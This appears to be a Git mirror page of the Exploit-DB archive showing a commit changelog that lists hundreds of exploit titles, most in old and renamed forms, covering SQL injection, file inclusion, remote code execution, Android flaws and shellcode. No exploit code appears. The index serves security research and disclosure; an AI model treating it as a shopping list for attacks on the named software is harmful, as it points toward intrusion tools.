bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40947.html
Offensive Security a099e58626 DB: 2016-12-22 
3 new exploits

Android - getpidcon Usage binder Service Replacement Race Condition
Google Android - getpidcon Usage binder Service Replacement Race Condition

ADODB < 4.70 - (tmssql.php) Denial of Service
ADODB < 4.70 - 'tmssql.php' Denial of Service

FlashGet 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Execution (PoC)
SopCast SopCore Control ActiveX - Remote Exec (PoC)
UUSee ReliPlayer ActiveX - Remote Exec (PoC)
SPlayer XvidDecoder 3.3 - ActiveX Remote Exec (PoC)
SopCast SopCore Control ActiveX - Remote Execution (PoC)
UUSee ReliPlayer ActiveX - Remote Execution (PoC)
SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC)

Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec (PoC)
Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)

EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities
EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities

Android Kernel 2.6 - Local Denial of Service Crash (PoC)
Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)

IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities
IBM solidDB 6.0.10 - Format String / Denial of Service

OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities
OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities

Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities
Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow

Android - ih264d_process_intra_mb Memory Corruption
Google Android - 'ih264d_process_intra_mb' Memory Corruption
Android - IOMX getConfig/getParameter Information Disclosure
Android - IMemory Native Interface is Insecure for IPC Use
Google Android - IOMX getConfig/getParameter Information Disclosure
Google Android - IMemory Native Interface is Insecure for IPC Use

Android Broadcom Wi-Fi Driver - Memory Corruption
Google Android Broadcom Wi-Fi Driver - Memory Corruption

Android - /system/bin/sdcard Stack Buffer Overflow
Google Android - '/system/bin/sdcard' Stack Buffer Overflow
Android - Insufficient Binder Message Verification Pointer Leak
Android - 'gpsOneXtra' Data Files Denial of Service
Google Android - Insufficient Binder Message Verification Pointer Leak
Google Android - 'gpsOneXtra' Data Files Denial of Service

Android - Binder Generic ASLR Leak
Google Android - Binder Generic ASLR Leak

Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index
Google Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index

Google Android -  WifiNative::setHotlist Stack Overflow
Google Android - WifiNative::setHotlist Stack Overflow
Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)
Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)

PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow
PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow

Android 1.x/2.x - Privilege Escalation
Google Android 1.x/2.x - Privilege Escalation

Android - 'sensord' Privilege Escalation
Google Android - 'sensord' Privilege Escalation

tcpdump - ISAKMP Identification payload Integer Overflow
tcpdump - ISAKMP Identification Payload Integer Overflow

Smail 3.2.0.120 -  Heap Overflow
Smail 3.2.0.120 - Heap Overflow

HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit
HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution

Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting

navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities
navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure

dwebpro 6.8.26 - (Directory Traversal/File Disclosure) Multiple Vulnerabilities
dwebpro 6.8.26 - Directory Traversal / File Disclosure

citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities
citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec (PoC)
Trend Micro Web-Deployment ActiveX - Remote Exec (PoC)
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)
Trend Micro Web-Deployment ActiveX - Remote Execution (PoC)
Apache OFBiz - SQL Remote Execution PoC Payload
Apache OFBiz - FULLADMIN Creator PoC Payload
Apache OFBiz - Remote Execution (via SQL Execution) (PoC)
Apache OFBiz - Admin Creator (PoC)

Android 2.0 < 2.1 - Reverse Shell Exploit
Google Android 2.0 < 2.1 - Reverse Shell Exploit

Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit

Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit
Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free Exploit

Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap
Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap

ASUS RT-AC66U - 'acsd' Parameter  Remote Command Execution
ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution

WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities
WinComLPD Total 3.0.2.623 - Buffer Overflow / Authentication Bypass

Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow
Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow

McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - (ePowner) Multiple Vulnerabilities
McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities

ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities
ServletExec - Directory Traversal / Authentication Bypass

Android - 'Stagefright' Remote Code Execution
Google Android - 'Stagefright' Remote Code Execution

Android - libstagefright Integer Overflow Remote Code Execution
Google Android - libstagefright Integer Overflow Remote Code Execution

Android 2.3.5 - PowerVR SGX Driver Information Disclosure
Google Android 2.3.5 - PowerVR SGX Driver Information Disclosure

Android ADB Debug Server - Remote Payload Execution (Metasploit)
Google Android ADB Debug Server - Remote Payload Execution (Metasploit)

Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)
Google Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)

Android - 'BadKernel' Remote Code Execution
Google Android - 'BadKernel' Remote Code Execution

Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)
Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)

NETGEAR WNR2000v5 - Remote Code Execution
Linux/x86 - portbind payload Shellcode (Generator)
Windows XP SP1 - portbind payload Shellcode (Generator)
Linux/x86 - Portbind Payload Shellcode (Generator)
Windows XP SP1 - Portbind Payload Shellcode (Generator)

Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)
Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)

phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution
phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution

Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)
Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection

Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion
Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion

Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion
Integramod Portal 2.0 rc2 - 'phpbb_root_path' Parameter Remote File Inclusion

paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion
paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion

Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion
Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion

blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
blogme 3.0 - Cross-Site Scripting / Authentication Bypass

torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities
torrentflux 2.2 - Arbitrary File Create/ Execute/Delete

BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities
BBS E-Market Professional - Full Path Disclosure / File Inclusion

myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion
myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion

ig shop 1.0 - (Code Execution / SQL Injection) Multiple Vulnerabilities
ig shop 1.0 - Code Execution / SQL Injection

QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities
QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities

vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting

forum livre 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
forum livre 1.0 - SQL Injection / Cross-Site Scripting

otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
otscms 2.1.5 - SQL Injection / Cross-Site Scripting

Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities
Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities

wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
wbblog - Cross-Site Scripting / SQL Injection

PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion
PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion

Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion

PHP Coupon Script 3.0 - (index.php bus) SQL Injection
PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection

runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities
runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities

NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities
NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path

bugmall shopping cart 2.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting

PHPVID 0.9.9 - (categories_type.php cat) SQL Injection
PHPVID 0.9.9 - 'categories_type.php' SQL Injection

bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
bcoos 1.0.10 - Local File Inclusion / SQL Injection

ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass

falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting

gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion

PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass

netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
netrisk 1.9.7 - Cross-Site Scripting / SQL Injection
EasyClassifields 3.0 - (go) SQL Injection
CMSbright - (id_rub_page) SQL Injection
EasyClassifields 3.0 - 'go' Parameter SQL Injection
CMSbright - 'id_rub_page' Parameter SQL Injection
myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection
Coupon Script 4.0 - 'id' SQL Injection
Reciprocal Links Manager 1.1 - (site) SQL Injection
myPHPNuke < 1.8.8_8rc2 - 'artid' Parameter SQL Injection
Coupon Script 4.0 - 'id' Parameter SQL Injection
Reciprocal Links Manager 1.1 - 'site' Parameter SQL Injection
CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection
Spice Classifieds - (cat_path) SQL Injection
CS-Cart 1.3.5 - Authentication Bypass
Spice Classifieds - 'cat_path' Parameter SQL Injection

aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
Living Local Website - 'listtest.php r' SQL Injection
ACG-PTP 1.0.6 - 'adid' SQL Injection
qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ACG-ScriptShop - 'cid' SQL Injection
AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution
Living Local Website - 'listtest.php' SQL Injection
ACG-PTP 1.0.6 - 'adid' Parameter SQL Injection
qwicsite pro - SQL Injection / Cross-Site Scripting
ACG-ScriptShop - 'cid' Parameter SQL Injection
AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution
Vastal I-Tech Agent Zone - (ann_id) SQL Injection
Vastal I-Tech Visa Zone - (news_id) SQL Injection
Vastal I-Tech Toner Cart - 'id' SQL Injection
Vastal I-Tech Share Zone - 'id' SQL Injection
Vastal I-Tech DVD Zone - 'cat_id' SQL Injection
Vastal I-Tech Jobs Zone - (news_id) SQL Injection
Vastal I-Tech MMORPG Zone - (game_id) SQL Injection
Vastal I-Tech Mag Zone - 'cat_id' SQL Injection
Vastal I-Tech Freelance Zone - (coder_id) SQL Injection
Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection
EsFaq 2.0 - (idcat) SQL Injection
Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection
Vastal I-Tech Dating Zone - (fage) SQL Injection
Vastal I-Tech Agent Zone - 'ann_id' Parameter SQL Injection
Vastal I-Tech Visa Zone - 'news_id' Parameter SQL Injection
Vastal I-Tech Toner Cart - 'id' Parameter SQL Injection
Vastal I-Tech Share Zone - 'id' Parameter SQL Injection
Vastal I-Tech DVD Zone - 'cat_id' Parameter SQL Injection
Vastal I-Tech Jobs Zone - 'news_id' Parameter SQL Injection
Vastal I-Tech MMORPG Zone - 'game_id' Parameter SQL Injection
Vastal I-Tech Mag Zone - 'cat_id' Parameter SQL Injection
Vastal I-Tech Freelance Zone - 'coder_id' Parameter SQL Injection
Vastal I-Tech Cosmetics Zone - 'cat_id' Parameter SQL Injection
EsFaq 2.0 - 'idcat' Parameter SQL Injection
Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' Parameter SQL Injection
Vastal I-Tech Dating Zone - 'fage' Parameter SQL Injection
Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection
Alstrasoft Forum - (cat) SQL Injection
Masir Camp E-Shop Module 3.0 - 'ordercode' Parameter SQL Injection
Alstrasoft Forum - 'cat' Parameter SQL Injection

Alstrasoft Forum - 'catid' SQL Injection
Alstrasoft Forum - 'catid' Parameter SQL Injection

Creator CMS 5.0 - (sideid) SQL Injection
Creator CMS 5.0 - 'sideid' Parameter SQL Injection

CMS Buzz - 'id' SQL Injection
CMS Buzz - 'id' Parameter SQL Injection
phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection
PhpWebGallery 1.3.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Autodealers CMS AutOnline - (pageid) SQL Injection
Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion
PHPVID 1.1 - Cross-Site Scripting / SQL Injection
Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection
PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion
Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection
Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion
Autodealers CMS AutOnline - 'id' SQL Injection
Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection
PhpWebGallery 1.3.4 - (cat) Blind SQL Injection
Autodealers CMS AutOnline - 'id' Parameter SQL Injection
Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection
PhpWebGallery 1.3.4 - Blind SQL Injection

phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
phpsmartcom 0.2 - Local File Inclusion / SQL Injection

AvailScript Article Script - 'view.php v' SQL Injection
AvailScript Article Script - 'view.php' SQL Injection

Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection

mini-pub 0.3 - (File Disclosure/Code Execution) Multiple Vulnerabilities
mini-pub 0.3 - File Disclosure / Code Execution

websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities
websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution

phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities
phpdaily - SQL Injection / Cross-Site Scripting / Local File Download

questcms - (Cross-Site Scripting / Directory Traversal / SQL Injection) Multiple Vulnerabilities
questcms - Cross-Site Scripting / Directory Traversal / SQL Injection

MatPo Link 1.2b - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting

WEBBDOMAIN WebShop 1.02 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting

Prozilla Software Directory - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Prozilla Software Directory - Cross-Site Scripting / SQL Injection

TurnkeyForms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection

zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting
Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities
Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting
Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload

MODx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting
ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ftpzik - Cross-Site Scripting / Local File Inclusion
bandwebsite 1.5 - SQL Injection / Cross-Site Scripting

nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities
nitrotech 0.0.3a - Remote File Inclusion / SQL Injection
chipmunk topsites - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
chipmunk topsites - Authentication Bypass / Cross-Site Scripting
Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting

Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure

comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting

minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities
minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass

wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities
wbstreet 1.0 - SQL Injection / File Disclosure

template creature - (SQL Injection / File Disclosure) Multiple Vulnerabilities
template creature - SQL Injection / File Disclosure

merlix educate servert - (Authentication Bypass/File Disclosure) Multiple Vulnerabilities
merlix educate servert - Authentication Bypass / File Disclosure

nightfall personal diary 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities
nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure

ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities
ASP AutoDealer - SQL Injection / File Disclosure

aspmanage banners - (Arbitrary File Upload / File Disclosure) Multiple Vulnerabilities
aspmanage banners - Arbitrary File Upload / File Disclosure

asp talk - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
asp talk - SQL Injection / Cross-Site Scripting

webcaf 1.4 - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
webcaf 1.4 - Local File Inclusion / Remote Code Execution

PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion

postecards - (SQL Injection / File Disclosure) Multiple Vulnerabilities
postecards - SQL Injection / File Disclosure

PHP Multiple Newsletters 2.7 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting
living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities
Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload
Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery

cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities
cf shopkart 5.2.2 - SQL Injection / File Disclosure

the net guys aspired2blog - (SQL Injection / File Disclosure) Multiple Vulnerabilities
the net guys aspired2blog - SQL Injection / File Disclosure

Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities
Joomla! Component live chat - SQL Injection / Open Proxy

Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities
Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion

autositephp 2.0.3 - (Local File Inclusion / Cross-Site Request Forgery / Edit File) Multiple Vulnerabilities
autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File

PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting

isweb CMS 3.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
isweb CMS 3.0 - SQL Injection / Cross-Site Scripting

clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
clickandemail - SQL Injection / Cross-Site Scripting

Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities
Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection

chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting

phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities
phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service

doop CMS 1.4.0b - (Cross-Site Request Forgery / Arbitrary File Upload) Multiple Vulnerabilities
doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload

phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting

ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
ezpack 4.2b2 - Cross-Site Scripting / SQL Injection

Netvolution CMS 1.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection
rankem - (File Disclosure / Cross-Site Scripting / cm) Multiple Vulnerabilities
blogit! - (SQL Injection / File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
rankem - File Disclosure / Cross-Site Scripting / Cookie
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting

gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities
gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion

revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
revou twitter clone - Cross-Site Scripting / SQL Injection

bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection

sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting

Android 'content://' URI - Multiple Information Disclosure Vulnerabilities
Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities
Power System Of Article Management 3.0 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting
team 1.x - File Disclosure / Cross-Site Scripting

gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities
gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass

Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities
Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure

SilverNews 2.04 - (Authentication Bypass / Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution
AdaptCMS Lite 1.4 - (Cross-Site Scripting / Remote File Inclusion) Multiple Vulnerabilities
SnippetMaster Webpage Editor 2.2.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion
SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting

dacio's CMS 1.08 - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities
dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure

ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
ideacart 0.02 - Local File Inclusion / SQL Injection

CmsFaethon 2.2.0 - (info.php item) SQL Command Injection
CmsFaethon 2.2.0 - info.php item SQL Command Injection

powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
powermovielist 0.14b - SQL Injection / Cross-Site Scripting

Graugon Forum 1 - 'id' SQL Command Injection
Graugon Forum 1 - 'id' Command Injection (via SQL Injection)

irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities
irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection

ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting
blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities
tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities
blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion
tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion

Wili-CMS 0.4.0 - (Remote File Inclusion / Local File Inclusion / Authentication Bypass) Multiple Vulnerabilities
Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass

PHP Director 0.21 - (sql into outfile) eval() Injection
PHP Director 0.21 - (SQL into outfile) eval() Injection

phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities
phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting

phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
phpmysport 1.4 - Cross-Site Scripting / SQL Injection

Kim Websites 1.0 - (Authentication Bypass) SQL Injection
Kim Websites 1.0 - Authentication Bypass

Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities
Bloginator 1a - Cookie Bypass / SQL Injection

Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Pixie CMS - Cross-Site Scripting / SQL Injection
Codice CMS 2 - SQL Command Execution
Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection
Codice CMS 2 - Command Execution (via SQL Injection)
Syzygy CMS 0.3 - Local File Inclusion / SQL Injection

acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities
acute control panel 1.0.0 - SQL Injection / Remote File Inclusion

Diskos CMS Manager - (SQL Injection / File Disclosure/Authentication Bypass) Multiple Vulnerabilities
Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass
ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting

flatnux 2009-03-27 - (Arbitrary File Upload / Information Disclosure) Multiple Vulnerabilities
